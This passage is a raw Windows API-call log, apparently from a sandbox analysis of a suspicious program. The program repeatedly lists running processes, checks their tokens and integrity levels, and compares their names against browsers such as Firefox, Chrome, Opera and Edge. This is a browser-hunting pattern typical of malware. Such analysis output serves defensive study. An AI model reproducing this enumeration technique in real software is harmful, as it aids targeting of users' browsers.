TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0575.299] GetLastError () returned 0x7a [0575.299] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0575.299] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0575.299] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0575.299] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0575.299] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0575.299] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0575.299] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0575.299] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0575.299] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0575.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0575.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0575.300] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0575.300] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0575.300] GetLastError () returned 0x7a [0575.300] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0575.300] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0575.300] CloseHandle (hObject=0x29c) returned 1 [0575.300] CloseHandle (hObject=0x298) returned 1 [0575.301] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0575.301] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0575.301] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0575.301] GetLastError () returned 0x7a [0575.301] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0575.301] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0575.301] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0575.301] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0575.301] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0575.301] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0575.302] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0575.302] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0575.302] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0575.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0575.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0575.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0575.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0575.302] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0575.302] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0575.302] GetLastError () returned 0x7a [0575.303] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0575.303] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0575.303] CloseHandle (hObject=0x29c) returned 1 [0575.303] CloseHandle (hObject=0x298) returned 1 [0575.303] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0575.303] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0575.303] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0575.303] GetLastError () returned 0x7a [0575.304] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0575.304] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0575.304] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0575.304] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0575.304] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0575.304] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0575.304] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0575.304] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0575.304] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0575.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0575.304] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0575.306] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0577.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9a28) returned 0xc0000004 [0577.317] VirtualAlloc (lpAddress=0x0, dwSize=0xaa28, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0577.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xaa28, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0577.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0577.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0577.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0577.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0577.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0577.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0577.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0577.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0577.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0577.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0577.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0577.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0577.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0577.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0577.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0577.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0577.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0577.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0577.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0577.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0577.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0577.321] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0577.321] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0577.321] GetLastError () returned 0x7a [0577.321] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0577.322] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0577.322] CloseHandle (hObject=0x29c) returned 1 [0577.322] CloseHandle (hObject=0x298) returned 1 [0577.322] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0577.322] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0577.322] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0577.322] GetLastError () returned 0x7a [0577.322] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0577.323] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0577.323] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0577.323] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0577.323] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0577.323] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0577.323] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0577.323] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0577.323] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0577.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0577.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0577.323] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0577.324] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0577.324] GetLastError () returned 0x7a [0577.324] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0577.324] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0577.324] CloseHandle (hObject=0x29c) returned 1 [0577.324] CloseHandle (hObject=0x298) returned 1 [0577.324] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0577.324] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0577.324] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0577.325] GetLastError () returned 0x7a [0577.325] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0577.325] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0577.325] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0577.325] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0577.325] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0577.325] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0577.325] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0577.325] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0577.325] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0577.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0577.326] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0577.326] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0577.326] GetLastError () returned 0x7a [0577.326] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0577.326] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0577.326] CloseHandle (hObject=0x29c) returned 1 [0577.326] CloseHandle (hObject=0x298) returned 1 [0577.326] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0577.327] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0577.327] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0577.327] GetLastError () returned 0x7a [0577.327] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0577.327] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0577.327] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0577.327] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0577.327] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0577.327] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0577.327] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0577.328] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0577.328] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0577.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0577.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0577.328] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0577.328] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0577.328] GetLastError () returned 0x7a [0577.328] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0577.328] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0577.328] CloseHandle (hObject=0x29c) returned 1 [0577.329] CloseHandle (hObject=0x298) returned 1 [0577.329] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0577.329] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0577.329] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0577.329] GetLastError () returned 0x7a [0577.329] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0577.329] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0577.329] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0577.329] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0577.330] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0577.330] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0577.330] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0577.330] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0577.330] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0577.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0577.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0577.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0577.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0577.330] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0577.330] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0577.331] GetLastError () returned 0x7a [0577.331] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0577.331] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0577.331] CloseHandle (hObject=0x29c) returned 1 [0577.331] CloseHandle (hObject=0x298) returned 1 [0577.331] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0577.331] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0577.331] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0577.332] GetLastError () returned 0x7a [0577.332] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0577.332] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0577.332] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0577.332] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0577.332] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0577.333] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0577.333] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0577.333] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0577.333] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0577.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0577.333] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0577.334] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0579.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9a28) returned 0xc0000004 [0579.345] VirtualAlloc (lpAddress=0x0, dwSize=0xaa28, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0579.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xaa28, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0579.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0579.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0579.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0579.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0579.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 